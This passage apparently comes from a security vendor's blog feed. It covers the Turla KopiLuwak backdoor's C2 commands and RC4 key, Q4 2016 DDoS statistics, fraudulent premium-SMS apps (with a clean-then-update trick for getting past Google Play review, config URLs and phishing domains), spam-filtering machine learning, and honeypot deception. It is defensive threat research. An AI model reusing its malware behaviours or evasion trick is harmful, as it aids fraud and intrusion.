In the case of an answer of “good”, the JavaScript will then sleep for a random amount of time, ranging from 3600-3900 seconds.

The “exit” command will cause script to exit gracefully, thus shutting down the communications to the C2 server until next startup / login from the user.

The “fail” command is for uninstalling the JavaScript and its persistence. Both the “mailform.js” file and registry key created for persistence will be deleted upon receipt of this command.

The “work” command is used to task the victim’s system to run arbitrary commands via Wscript.shell.run(). It begins by checking to see if a file “mailform.pif” exists in the same directory as the JavaScript, and if so, it will delete it. The victim will then send a POST request to the C2 much in the same way as before with the beacon traffic, but with some slight differences. The User-Agent header will remain the same as in the beacon traffic, but the data sent to the C2 will consist of the 4-byte string “work”. If the response from the server after this acknowledgement is “200 OK”, then the system will proceed to read the response data into memory, RC4 encrypt it using the same key “2f532d6baec3d0ec7b1f98aed4774843”, then write it out to the “mailform.pif” file referenced above. The command file is run, the JavaScript will sleep for 30 seconds, and then the file is subsequently deleted.

Victims and Sinkholing

One of the domains involved in this new malware (soligro[.]com) expired in July 2016 and was was available for purchase and sinkhole at the time of the analysis. Sinkhole data shows several potential victims, with one high profile victim (195.251.32.62) located within the Greek Parliament:

The majority of connections to the sinkhole server have been observed from IP ranges residing within Greece. This leads us to believe the main target for the specific document above was Greece, although we also have indications of targeting in Romania and Qatar based on other data.

Conclusions

In recent months, the Turla actors have increased their activity significantly. The addition of KopiLuwak to their already existing ICEDCOFFEE JavaScript payload indicates the group continues to evolve and deliver new tools to avoid detection by known malware signatures.

Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents. While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method. It is advised that users disable macros in their enterprise and not allow the user to enable said content unless absolutely necessary. Furthermore, using the polymorphic obfuscation technique for the macros has caused difficulties in writing signatures for detection.

DDoS attacks in Q4 2016

Thu, 02/02/2017 - 06:00

News Overview

Without doubt, 2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life. In fact, the year ended with massive DDoS attacks unseen before, leveraging Mirai botnet technology, whose first appearance was covered in our last DDoS Intelligence Report.

Since then, we have published several other detailed reports dedicated to major attacks on Dyn’s Domain Name System (DNS) infrastructure, on Deutsche Telekom, which knocked 900K Germans offline in November. Additionally, we tracked similar attacks on Internet service providers (ISPs) in Ireland, the United Kingdom and Liberia all leveraging IoT devices controlled by Mirai technology and partly targeting home routers in an attempt to create new botnets.

Although ‘Rise of the Machines‘, as the Institute for Critical Infrastructure Technology (ICIT) titled its analysis, sounds quite blatant, it clearly shows that stakeholders worldwide, in particular in the United States and the European Union, recognize the lack of security inherent in the functional design of IoT devices and the need to set up a common IoT security ecosystem. And not before time, as we expect to see the emergence of further Mirai botnet modifications and a general increase in IoT botnet activity in 2017.

Altogether, the DDoS attacks we have seen so far are just a starting point initiated by various actors to draw up IoT devices into the actors’ own botnets, test drive Mirai technology and develop attack vectors. The DDoS attacks on five major Russian banks in November are a very good example of this.

First, they demonstrate once again that financial services like the bitcoin trading and blockchain platforms CoinSecure of India and BTC-e of Bulgaria, or William Hill, one of Britain’s biggest betting sites, which took days to come back to full service, were at the highest risk in the fourth quarter and are likely to remain so throughout 2017.

Second, cybercriminals have learnt to manage and launch very sophisticated, carefully planned, and constantly changing multi-vector DDoS attacks adapted to the mitigation policy and capacity of the attacked organization. As per our analysis, the cybercriminals in several other cases we tracked in 2016 started with a combination of various attack vectors gradually checking out a bank’s network and web services to find a point of service failure. Once DDoS mitigation and other countermeasures were initiated, the attack vectors changed over a period of several days.

Overall, these attacks show that the DDoS landscape entered the next stage of its evolution in 2016 with new technology, massive attack power, as well as highly skilled and professional cybercriminals. Unfortunately, this tendency has not yet found its way into the cybersecurity policies of many organizations that are still not ready or are unclear about the necessary investments in DDoS protection services.

Four main trends of the year

In 2016, the DDoS attack market saw a number of significant changes and developments. We have identified the four major trends:

  1. The demise of amplification-type attacks. These attacks have been around for a while and the methods for combating them are well-known and have been perfected over time. They remained quite popular in the first half of 2016, but it was clear their number and volume were gradually declining. By the end of 2016, cybercriminals had almost completely given up using malicious amplification-type attacks, ending a downward trend that had lasted several years. First of all, this is the result of countermeasures being developed for these attacks. It’s also down to a reduction in the number of vulnerable amplification hosts available to the attackers (DNS Amplification attacks are the best illustration of this) as their owners react to the performance problems and losses associated with these attacks and look for ways to patch vulnerabilities.

  2. Rising popularity of attacks on applications and the growth in their use of encryption. For the last few years UDP-based amplification attacks have remained the undisputed leader on the DDoS attack market, while attacks on applications have been relatively rare. In the second half of the year, and particularly in Q4, there was a dramatic increase in the popularity of attacks on applications, which gradually filled the niche previously occupied by amplification attacks. To organize such attacks, time-tested tools (Pandora, Drive, LOIC/HOIC) and new developments are used. Along with the growing popularity of attacks on applications, the number of these attacks using encryption is also growing. The use of encryption in most cases dramatically increases the efficiency of attacks and makes filtering them more difficult. In addition, cybercriminals continue to use an integrated approach, masking a small but effective attack on applications behind a simultaneous large-scale attack, for example, an attack involving a large number of short network packets (short-packet TCP flood).

  3. The rise in popularity of WordPress Pingback attacks. WordPress Pingback-type attacks, which were extremely rare at the start of 2016, had by the fourth quarter occupied a substantial amount of the DDoS attack market. This is currently one of the most popular attack methods targeting applications, and we consider them separately from the overall mass of attacks at the application level. Relatively simple to organize, the “fingerprint” of these attacks is very specific, and the corresponding traffic can be easily separated from the general traffic flow. However, carrying out such an attack using encryption (something that was observed by Kaspersky Lab experts in Q4 2016) greatly complicates filtering and increases the malicious potential of this type of attack.

  4. Use of IoT botnets to carry out DDoS attacks. After the publication of code on the GitHub resource on 24 October, Kaspersky Lab experts noticed a surge in interest in IoT devices among criminals, especially their use in botnets to perform DDoS attacks. The concepts and methods demonstrated by the creators of the Mirai botnet were used as the basis for a large number of new malicious codes and botnets consisting of IoT devices. These kinds of botnets were used in numerous attacks on Russian banks in Q4 2016. Unlike classic botnets, IoT-based botnets are huge in terms of both their volume and potential, something that was proved by the high-profile attack on the DNS DYN provider, which indirectly affected the work of many major web resources (e.g., Twitter, Airbnb, CNN and many others).

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.

DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the fourth quarter of 2016.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q4 Summary
  • Resources in 80 countries (vs. 67 in Q3) were targeted by DDoS attacks in Q4 2016.
  • 71.6% of targeted resources were located in China.
  • South Korea, China and the US remained leaders in terms of both the number of targets and number of detected C&C servers.
  • The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016.
  • SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method decreased by 5.7 p.p., while the shares of both TCP DDoS and HTTP DDoS grew considerably.
  • In Q4 2016, the percentage of attacks launched from Linux botnets decreased slightly and accounted for 76.7% of all detected attacks.
Geography of attacks

In Q4 2016, the geography of DDoS attacks expanded to 80 countries, with China accounting for 76.97% (4.4 p.p. more than the previous quarter). The US (7.3%) and South Korea (7%) were once again second and third respectively.

The Top 10 most targeted countries accounted for 96.9% of all attacks. Canada (0.8%) appeared in the rating, replacing Italy. Russia (1.75%) moved from fifth to fourth thanks to a 0.6 p.p. decline in Vietnam’s share.

Distribution of DDoS attacks by country, Q3 2016 vs. Q4 2016

Statistics for the fourth quarter show that the 10 most targeted countries accounted for 96.3% of all DDoS attacks.

Distribution of unique DDoS attack targets by country, Q3 2016 vs. Q4 2016

71.6% of attacks targeted resources located in China, which was 9 p.p. more than the previous quarter. There was a small increase in the number of targets in South Korea (+0.7 p.p.). The US rounded off the top three, even though its share decreased by 9.7 p.p. (9% vs.18.7% in Q3).

The shares of the other countries in the Top 10 remained almost unchanged, with the exception of Japan which saw a fall of 1 p.p. Italy and the Netherlands left the rating and were replaced by Germany (0.56%) and Canada (0.77%).

Changes in DDoS attack numbers

The distribution of DDoS activity was relatively even throughout Q4, with the exception of a sharp peak registered on 5 November when the largest number of attacks in 2016 – 1,915 – was recorded. The quietest day of Q4 was 23 November (90 attacks). However, by 25 November cybercriminal activity had increased to 981 attacks.

Number of DDoS attacks over time* in Q4 2016

*DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.

Saturday was the busiest day of the week in Q4 for DDoS attacks (18.2% of attacks), followed by Friday 1.7 p.p. behind. Monday became the quietest day of the week for DDoS attacks (11.6%).

Distribution of DDoS attack numbers by day of the week, Q3 and Q4 2016

Types and duration of DDoS attacks

The SYN DDoS method remained the most popular: its share accounted for 75.3% of attacks, although this figure is 5.7 p.p. less than in the previous quarter. The figures for other attack types increased slightly – TCP DDoS (from 8.2% to 10.7%) and ICMP DDoS (from 1.7% to 2.2%). UDP’s contribution remained almost unchanged.

Distribution of DDoS attacks by type, Q3 and Q4 2016

Distribution of DDoS attacks by duration (hours) in Q4 2016 was distinctly uneven. While the share of attacks that lasted no more than four hours remained almost the same as the previous quarter (it decreased by just 1.56 p.p.), the figures for the other time periods changed significantly.

The share of attacks that lasted 5-9 hours increased from 14.49% to 19.28%. Attacks lasting 10-19 hours fell by 1.3 p.p., while the proportion of attacks that lasted 20-49 hours fell by even more – minus 3.35 p.p. The percentage of even longer attacks decreased considerably – the share of attacks lasting 50–99 hours accounted for 0.94%, compared to 3.46% in the previous quarter. The share of attacks that lasted 100-150 hours grew and reached 2.2%, which meant that Q4 saw twice as many of these attacks than those lasting 50-99 hours. There were very few cases of attacks lasting longer than 150 hours.

The longest DDoS attack in the fourth quarter lasted for 292 hours, 8 hours longer than the Q3 maximum. This was also the longest attack of 2016.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2016

C&C servers and botnet types

In Q4, the highest number of C&C servers (59.06%) was detected in South Korea. Although the country’s contribution increased by 13.3 p.p. from the previous quarter, it is much less than in Q2 2016 (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China (8.72%) and the US (8.39%). Their total share accounted for 76.1%, which is an increase of 8.4 p.p. compared to Q3.

In the fourth quarter, three Western European countries – the Netherlands (7.4%), the UK (1.3%), and France (1.7%) – remained in the Top 10 after entering it back in Q3. Among the newcomers to the C&C rating were Bulgaria (6%) and Japan (1.3%).

Distribution of botnet C&C servers by country in Q4 2016

When it came to the distribution of operating systems in Q4, Linux-based DDoS bots remained the clear leader, although their share decreased by 2.2 p.p., accounting for 76.7%. This correlates with the decline in popularity of SYN DDoS for which Linux bots are the most appropriate tool.

The growing popularity of IoT devices used for DDoS attacks suggests that in 2017 the balance will shift further towards Linux, since most Internet-connected devices are based on this operating system.

Correlation between attacks launched from Windows and Linux botnets, Q3 and Q4 2016

The majority of attacks – 99.7% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.3% of cases.

Conclusions and forecasts

We expect the share of amplification-type attacks in 2017 to continue to decrease, especially the most popular types (DNS, NTP). However, considering the simplicity and low organizational costs, the technique may be used in some less popular protocols suitable for amplification (RIP, SSDP, LDAP and so on), though it is unlikely that such attacks will be very effective.

The number and complexity of attacks on applications will continue to grow. Considering the renewed interest in this type of attack among cybercriminals and the stagnation in this segment over the last few years, we can assume that older botnets will gradually fall out of use and something new will appear, for example, botnets capable of more sophisticated attacks. The trend for encryption in attacks on applications will remain.

WordPress Pingback attacks will remain popular. Although in the newer versions of the WordPress CMS the vulnerability used for organizing such attacks (namely, the default Pingback function in older CMS versions) has long since been patched by the developers, there are still many vulnerable hosts on the Internet. Of course, their number will decline over time, reducing the number and power of WordPress Pingback attacks. But the relative simplicity and low cost of organizing such attacks, as well as the possibility of using encryption, makes WordPress Pingback-type attacks attractive to unpretentious cybercriminals.

Botnets based on IoT devices will continue to grow. This is largely due to both the novelty of the IoT concept in general and exploitation of IoT devices by cybercriminals. We can assume that in the fourth quarter of 2016 we only saw the emergence of this new market segment, and in 2017 it will continue to grow and develop. The potential growth is difficult to estimate: until now IoT-device manufacturers were not particularly concerned about protecting their products. Even if we assume that all new IoT devices entering the market are perfectly protected from malicious attacks (which in itself is quite doubtful), the current volume of vulnerable IoT devices with Internet access is considerable. Just a few months after the initial appearance of the concept, attackers were able to demonstrate the use of botnets of unprecedented size and conduct attacks whose power was previously only considered possible in theory. Moreover, these devices have the potential to launch attacks of any complexity – the current trend is attacks on applications, including the use of encryption. Considering the highly effective nature and huge potential of IoT-based attacks, we can predict an increase in the number of such attacks as well as their volume and complexity in 2017.

How to succeed in online investigations and digital forensics

Wed, 02/01/2017 - 07:01

Link analysis training from Maltego developers

Maltego, the tool best known for deep data mining and link analysis, has helped law enforcement and intelligence agencies, banking organizations, financial institutions and others in security-related work since it was released in 2008.

To benefit from using Maltego, come to SAS 2017 for intensive Digital Intelligence Gathering training from the experts who created the tool from scratch: there won’t be any questions that they can’t answer. The course runs for two days, from April 1st and 2nd 2017 on St. Maarten. Book a seat now — the class is limited to 15 people maximum!

Down with the Excel worksheets

Maltego brings power to any online investigation, processing publicly available information that is hard to see with the naked eye. But it’s not just about mining — it’s also about analyzing and visualizing relationships between people and groups of people, companies, organizations, web sites, Internet infrastructure (domains, DNS names, netblocks, IP addresses) and affiliations (documents and files). The tool grabs information from DNS and whois records, search engines, social networks, online APIs and metadata. The results are provided in different graphical orders for better clustering, which brings into view hidden connections even if they are three or four degrees of separation, and even attempts makes attribution attainable.

Why do you need the training before you start using Maltego

During the two-day course participants will discover the entire Maltego ecosystem and learn how to use the tool properly to get most out of it. The trainers guarantee that you will go out with an understanding of how to apply the tool in your organizations and how to accurately interpret this kind of node based graph:

Source: www.paterva.com

All practical exercises will involve real world data.

Trainers

Roelof Temmingh, Managing Director and founder of Paterva, the South African company that introduced Maltego to the world in 2008, and Andrew MacPherson, the operations manager at Paterva and lead Maltego server developer.

Roelof and Andrew invite pen-testers, LEAs, intelligence agencies and security experts from any industry dealing with digital data gathering.

Technical skills

Applicants should meet the following prerequisites. They should have knowledge of common Internet services (HTTP, DNS), search engines (Google hacking), basic IT security principles (such as port scanning), scripting or programming experience (Python, PERL). You’ll need a PC or Mac with an external mouse and at least 2GB of RAM, a decent resolution display and some space to install the latest version of Maltego.

Book a seat at sas.kaspersky.com now to see data in its true colors.

Expensive free apps

Mon, 01/23/2017 - 04:39

This post is the result of collaboration between 11paths (Telefonica’s Cybersecurity Global Unit) and Kaspersky Lab. Both companies have used their own expertise, researchers and tools, such as 11path’s Tacyt (Android apps monitoring) and GReAT’s internal tools and resources.

Big Brother and Google Play

Fraudulent apps trying to send Premium SMS messages or trying to call to high rate phone numbers are not something new. Actually, it is easy to find them specially in Spain, Russia and some other european countries. Of course, it is much more interesting to talk about how certain groups bypass detection mechanisms such as those used by Google Play, since this has become difficult to achieve in the past few years.

Some years ago it was pretty easy to upload a dialer (or other similar fraudulent app) to Google Play [1] [2], but new detection mechanisms made attacker to focus on alternative markets, at least for a period of time.

Recently, we have found a Spanish group that successfully uploaded a non-official Big Brother (Gran Hermano) TV show app, which is one of the most popular TV shows in Spain even being on the air for 16 years now.

[Analysis:cdd254ee6310331a82e96f32901c67c74ae12425]

This was not a very sophisticated app, but they were able to upload it into Google Play using an old trick. First, they uploaded a clean an innocuous version that of course passed or the security controls from Google Play. Then, some days later, a new version was uploaded with a major features update, including subscription to paying services. This trick was extremely simple but successful, since the app was in the Google Play for around two months (from mid September to mid November 2015).

It seems this was not the first time this group tried to upload a Big Brother-like app. We have detected (via Tacyt [3]) at least another 4 similar applications that, regarding some particular logging messages we found in the code, could have the same origin:

com.granhermano.gh16_1; from 2015-09-15 to 2015-09-22;
com.granhermano162; from 2015-09-29 to 2015-11-14;
com.granhermanodieciseis; from 2015-09-29 to 2015-11-11
com.granh.gh16_3; from 2015-10-05 to 2015-10-15;
com.hisusdk; from 2015-09-16 to 2015-11-14 (the one analyzed).

As we said before, this group was found to be using a specific string “caca” as a logging tag, which is not something usual:

The word “caca” is a colloquial word in Spanish referring to an excrement (very similar to the word “poo” in English). We could find it in certain testing code, referring to lines of code that should be removed later, but it is unusual to find it in such similar applications and used in the same way. Because of that, it makes sense to think that those applications were developed by the same group. Other strings and function names used in the code make us conclude that those applications could be developer by native Spanish speakers.

This app is using several commercial third party services such as Parse.com for the first network communication. This first API call is used in order to get all the information necessary to run further actions (URLs, authentication, etc).

{“results”:[{“Funcionamiento”:” Ahora la única pestaña importante es la de VOT.”,”action1″:”http://tempuri.org/getPinCode”,”action2″:”http://tempuri.org/crearSubscripcion”,”activa”:”si”,”createdAt”:”2015-09-08T16:17:24.550Z”,”estado”:true,”id_categoria”:”2608″,”id_subscripcion”:”400″,”metodo1″:”getPinCode”,”metodo2″:”crearSubscripcion”,”namespace”:”http://tempuri.org/”,”nombreApp”:”GH16 – españa”,”numero_corto”:”795059″,”numero_sms”:”+34911067088″,”objectId”:”tNREzkEocZ”,”password”:”15xw7v7u”,”updatedAt”:”2015-11-27T10:28:00.406Z”,”url”:”http://ws.alertas.aplicacionesmonsan.net/WebSubscription.asmx?WSDL”,”urlcode”:”http://spamea.me/getcode.php?code=”,”usuario”:”yourmob”,”vot”:true}]}

As we can see above, it references to different URLs:

spamea.me is service that no longer exists at the time of writing, but that used to be hosted on 107.6.184.212, which seems a hosting service shared with many other websites.

ws.alertas.aplicacionesmonsan.net is legitimate service focused on mobile monetization, including SMS premium and direct carrier billing. It is used from the app in order to subscribe the user to a service called “yourmob.com”.

Of course, using paying services is not malicious itself, since it is legitimate that companies could bill for their services, but user should be clearly noticed about service cost and conditions beforehand.

Despite we found a reference to “Terms and Conditions” (in Spanish) poiting to the website servimob.com , we could not verify that this information is shown to users and, anyway, users don’t have the opportunity to reject the agreement and don’t be subscribed.

Presence outside Google Play

It make sense that if a group have included this kind of app in Google Play, They were going to try something similar using other app sources (thanks to Facundo J. Sánchez that spotted this).

Analysis: 9b47070e65f81d253c2452edc5a0eb9cd17447f4

This app worked slightly different. It uses other 3rd party services and it sends Premium SMSs for monetization. They got from the server what number to use, for how many seconds and if the screen should be on or off.

We found that they used very similar words for comments and method names (most of them in Spanish, including “caca”), same topic (Big Brother), references to “yourmob” and much more, so definitely we can link it with the Spanish group mentioned before.

One of the webservices used by this application (http://104.238.188.38/806/) exposed a control panel showing information about people using this app:

As you probably know, groups developing this kind of apps usually reuse their servers and supporting infrastructure for multiple apps, for example this one:

https://www.virustotal.com/en-gb/file/cc2895442fce0145731b8e448d57e343d17ca0d4491b7fd452e6b9aaa4c2508a/analysis/

It was using this vps as well http://vps237553.ovh.net. Some of the panels and services provided by the VPS were located here:

http://vps237553.ovh.net/nexmo/getcode.php?code=
http://vps237553.ovh.net/polonia/autodirect1.php
http://vps237553.ovh.net/polonia/autodirect2.php
http://vps237553.ovh.net/polonia/guardar_instalacion.php
http://vps237553.ovh.net/polonia/guardar_numero.php
http://vps237553.ovh.net/polonia/guardar_numero.php?androidID=
http://vps237553.ovh.net/polonia/guardar_sms.php
http://vps237553.ovh.net/polonia/push_recibido.php
http://vps237553.ovh.net/polonia/panel.php
http://vps237553.ovh.net/nexmo/

As we can see in their control panel, they have been quite successful in terms of spread, since there are registered phones from many different countries (Spain, Holland, Poland, etc).

In addition, an iterative search on terms such as IP addresses, unique paths, etc, has shown that other apps could be using the same supporting infrastructure that was shown above, including the following IP addresses and domain names:

In particular, 45.32.236.127 was pointed by different domain names in the past months:

  • kongwholesaler.tk (2016-05-22)
  • acc-facebook.com (2016-04-11)
  • h-instagram.com (2016-04-11)
  • msg-vk.com (2016-04-11)
  • msg-google.ru (2016-04-10)
  • msg-mail.ru (2016-04-10)
  • iwantbitcoins.xyz (2015-11-04)

These domains have probably been used for fraudulent initiatives such as phishing attacks, since they are very similar to well-known and legitimate services.

Something that kept our attention was that “vps237553.ovh.net”, used from a sample and resolving to 51.255.199.164, was also used at some point (June 2016 regarding our passive DNS) by “servimob.com” domain (same domain referenced in the app from Google Play).

Back to Google Play

As you can imagine, they tried again to upload a new app to Google Play, following a similar philosophy and techniques that we have seen before.

e49faf379b827ee8d3a777e69f3f9bd3e559ba03
11a131c23e6427dd7e0e47280dd8f421febdc4f7

These apps were available in Google Play for a few weeks in September 2016, using similar techniques, especially to those applications that we found outside Google Play.

Conclusions

This Spanish group has been quite successful on uploading this kind of apps in Google Play, using interesting topics such as the Big Brother TV show. Spain and Poland have been two countries traditionally targeted by SMS scams and similar malware. However, we have never seen in the past few years any group that was able to upload apps to legitimate markets in such an easy way. Perhaps the key point is that they try to be close enough to the border between a legitimate business and a malicious one.

Machine learning versus spam

Fri, 01/20/2017 - 03:55

Machine learning methods are often presented by developers of security solutions as a silver bullet, or a magic catch-all technology that will protect users from a huge range of threats. But just how justified are these claims? Unless explanations are provided as to where and how exactly these technologies are used, these assertions appear to be little more than a marketing ploy.

For many years, machine learning technology has been a working component of Kaspersky Lab’s security products, and our firm belief is that they must not be seen as a super technology capable of combating all threats. Yes, they are a highly effective protection tool, but just one tool among many. My colleague Alexey Malanov even made the point of writing an article on the Myths about machine learning in cybersecurity.

At Kaspersky Lab, machine learning can be found in a number of different areas, especially when dealing with the interesting task of spam detection. This particular task is in fact much more challenging than it appears to be at first glance. A spam filter’s job is not only to detect and filter out all messages with undesired content but, more importantly, it has to ensure all legitimate messages are delivered to the recipient. In other words, type I errors, or so-called false positives, need to be kept to a minimum.

Another aspect that should not be forgotten is that the spam detection system needs to respond quickly. It must work pretty much instantaneously; otherwise, it will hinder the normal exchange of email traffic.

A graphic representation can be provided in a project management triangle, only in our case the three corners represent speed, absence of false positives, and the quality of spam detection; no compromise is possible on any of these three. If we were to go to extremes, for example, spam could be filtered manually – this would provide 100% effectiveness, but minimal speed. In another extreme case, very rigid rules could be imposed, so no email messages whatsoever would pass – the recipient would receive no spam and no legitimate messages. Yet another approach would be to filter out only known spam; in that case, some spam messages would still reach the recipient. To find the right balance inside the triangle, we use machine learning technologies, part of which is an algorithm enabling the classifier to pass prompt and error-free verdicts for every email message.

How is this algorithm built? Obviously, it requires data as input. However, before data is fed into the classifier, is must be cleansed of any ‘noise’, which is yet another problem that needs to be solved. The greatest challenge about spam filtration is that different people may have different criteria for deciding which messages are valid, and which are spam. One user may see sales promotion messages as outright spam, while another may consider them potentially useful. A message of this kind creates noise and thus complicates the process of building a quality machine learning algorithm. Using the language of statistics, there may be so-called outlier values in the dataset, i.e., values that are dramatically different from the rest of the data. To address this problem, we implemented automatic outlier filtration, based on the Isolation Forest algorithm customized for this purpose. Naturally, this removes only some of the noise data, but has already made life much easier for our algorithms.

After this, we obtain data that is practically ‘clean’. The next task is to convert the data into a format that the classifier can understand, i.e., into a set of identifiers, or features. Three of the main types of features used in our classifier are:

  • Text features – fragments of text that often occur in spam messages. After preprocessing, these can be used as fairly stable features.
  • Expert features – features based on expert knowledge accumulated over many years in our databases. They may be related to domains, the frequency of headers, etc.
  • Raw features. Perhaps the most difficult to understand. We use parts of the message in their raw form to identify features that we have not yet factored in. The message text is either transformed using word embedding or reduced to the Bag-of-Words model (i.e., formed into a multiset of words which does not account for grammar and word order), and then passed to the classifier, which autonomously identifies features.

All these features and their combinations will help us in the final stage – the launch of the classifier.

What we eventually want to see is a system that produces a minimum of false positives, works fast and achieves its principal aim – filtering out spam. To do this, we build a complex of classifiers, and it is unique for each set of features. For example, the best results for expert features were demonstrated by gradient boosting – the sequential building up of a composition of machine learning algorithms, in which each subsequent algorithm aims to compensate for the shortcomings of all previous algorithms. Unsurprisingly, boosting has demonstrated good results in solving a broad range of problems involving numerical and category features. As a result, the verdicts of all classifiers are integrated, and the system produces a final verdict.

Our technologies also take into account potential problems such as over-training, i.e., a situation when an algorithm works well with a training data sample, but is ineffective with a test sample. To preclude this sort of problem from occurring, the parameters of classification algorithms are selected automatically, with the help of a Random Search algorithm.

This is a general overview of how we use machine learning to combat spam. To see how effective this method is, it is best to view the results of independent testing.

Deceive in order to detect

Thu, 01/19/2017 - 05:32

Interactivity is a security system feature that implies interaction with the attacker and their tools as well as an impact on the attack scenario depending on the attacker’s actions. For example, introducing junk search results to confuse the vulnerability scanners used by cybercriminals is interactive. As well as causing problems for the cybercriminals and their tools, these methods have long been used by researchers to obtain information about the fraudsters and their goals.

There is a fairly clear distinction between interactive and “offensive” protection methods. The former imply interaction with attackers in order to detect them inside the protected infrastructure, divert their attention and lead them down the wrong track. The latter may include all the above plus exploitation of vulnerabilities on the attackers’ own resources (so-called “hacking-back”). Hacking-back is not only against the law in many countries (unless the defending side is a state organization carrying out law enforcement activities) it may also endanger third parties, such as users’ computers compromised by cybercriminals.

The use of interactive protection methods that don’t break the law and that can be used in an organization’s existing IT security processes make it possible not only to discover if there is an intruder inside the infrastructure but also to create a threat profile.

One such approach is Threat Deception – a set of methods, specialized solutions and processes that have long been used by researchers to analyze threats. In our opinion, this approach can also be used to protect valuable data inside the corporate network from targeted attacks.

Characteristics of targeted attacks

Despite the abundance of technology and specialized solutions to protect corporate networks, information security incidents continue to occur even in large organizations that invest lots of money to secure their information systems.

Part of the reason for these incidents is the fact that the architecture of automated security solutions, based on identifying patterns in general traffic flows or monitoring a huge number of endpoints, will sooner or later fail to recognize an unknown threat or a criminal stealing valuable data from the infrastructure. This may occur, for example, if the attacker has studied the specific features of a corporate security system in advance and identified a way of stealing valuable data that will go unnoticed by security solutions and will be lost among the legitimate operations of other users.

nother reason is the fact that APT attacks differ from other types of attacks: in terms of target selection and pinpoint execution, they are similar to surgical strikes, rather than the blanket bombing of mass attacks.

The organizers of targeted attacks carefully study the targeted infrastructure, identifying gaps in configuration and vulnerabilities that can be exploited during an attack. With the right budget, an attacker can even deploy the products and solutions that are installed in the targeted corporate network on a testbed. Any vulnerabilities or flaws identified in the configuration may be unique to a specific victim.

This allows cybercriminals to go undetected on the network and steal valuable data for long periods of time.

To protect against an APT, it is necessary not only to combat the attacker’s tools (utilities to analyze security status, malicious code, etc.) but to use specific behavioral traits on the corporate network to promptly detect their presence and prevent any negative consequences that may arise from their actions. Despite the fact that the attacker usually has enough funds to thoroughly examine the victim’s corporate network, the defending side still has the main advantage – full physical access to its network resources. And it can use this to create its own rules on its own territory for hiding valuable data and detecting an intruder.

After all, “locks only keep an honest person honest,” but with a motivated cybercriminal a lock alone is not enough – a watchdog is required to notify the owner about a thief before he has time to steal something.

Interactive games with an attacker

In our opinion, in addition to the obligatory conventional methods and technologies to protect valuable corporate information, the defensive side needs to build interactive security systems in order to get new sources of information about the attacker who, for one reason or another, has been detected inside the protected corporate network.

Interactivity in a security system implies a reaction to the attacker’s actions. That reaction, for instance, may be the inclusion of the attacker’s resources to a black list (e.g. the IP address of the workstations from which the attack is carried out) or the isolation of compromised workstations from other network resources. An attacker who is looking for valuable data within a corporate network may be deliberately misled, or the tools used by the attacker, such as vulnerability scanners, could be tricked into leading them in the wrong direction.

Let’s assume that the defending side has figured out all the possible scenarios where the corporate network can be compromised and sets traps on the protected resource:

  • a special tool capable of deceiving automated vulnerability scanners and introducing all sorts of “junk” (information about non-existent services or vulnerabilities, etc.) in reports;
  • a web scenario containing a vulnerability that, when exploited, leads the attacker to the next trap (described below);
  • a pre-prepared section of the web resource that imitates the administration panel and contains fake documents.

How can these traps help?

Below is a simple scenario showing how a resource with no special security measures can be compromised:

  1. The attacker uses a vulnerability scanner to find a vulnerability on the server side of the protected infrastructure, for example, the ability to perform an SQL injection in a web application.
  2. The attacker successfully exploits this vulnerability on the server side and gains access to the closed zone of the web resource (the administration panel).
  3. The attacker uses the gained privileges to study the inventory of available resources, finds documents intended for internal use only and downloads them.

Let’s consider the same scenario in the context of a corporate network where the valuable data is protected using an interactive system:

  1. The attacker searches for vulnerabilities on the server side of the protected infrastructure using automated means (vulnerability scanner and directory scanner). Because the defending side has pre-deployed a special tool to deceive scanning tools, the attacker has to spend time analyzing the scan results, after which the attacker finds a vulnerability – the trap on the server side of the protected infrastructure.
  2. The attacker successfully exploits the detected vulnerability and gains access to the closed zone of the web resource (the administration panel). The attempt to exploit the vulnerability is recorded in the log file, and a notification is sent to the security service team.
  3. The attacker uses the gained privileges to study the inventory of available resources, finds the fake documents and downloads them.
  4. The downloaded documents contain scripts that call the servers controlled by the defending side. The parameters of the call (source of the request, time, etc.) are recorded in the log file. This information can then be used for attacker attribution (what type of information they are interested in, where the workstations used in the attack are located, the subnets, etc.) and to investigate the incident.
Detecting an attack by deceiving the attacker

Currently, in order to strengthen protection of corporate networks the so-called Threat Deception approach is used. The term ‘deception’ comes from the military sphere, where it refers to a combination of measures aimed at misleading the enemy about one’s presence, location, actions and intentions. In IT security, the objective of this interactive system of protection is to detect an intruder inside the corporate network, identifying their attributes and ultimately removing them from the protected infrastructure.

The threat deception approach involves the implementation of interactive protection systems based on the deployment of traps (honeypots) in the corporate network and exploiting specific features of the attacker’s behavior. In most cases, honeypots are set to divert the attacker’s attention from the truly valuable corporate resources (servers, workstations, databases, files, etc.). The use of traps also makes it possible to get information about any interaction between the attacker and the resource (the time interactions occur; types of data attracting the attacker’s attention, toolset used by the attacker, etc.).

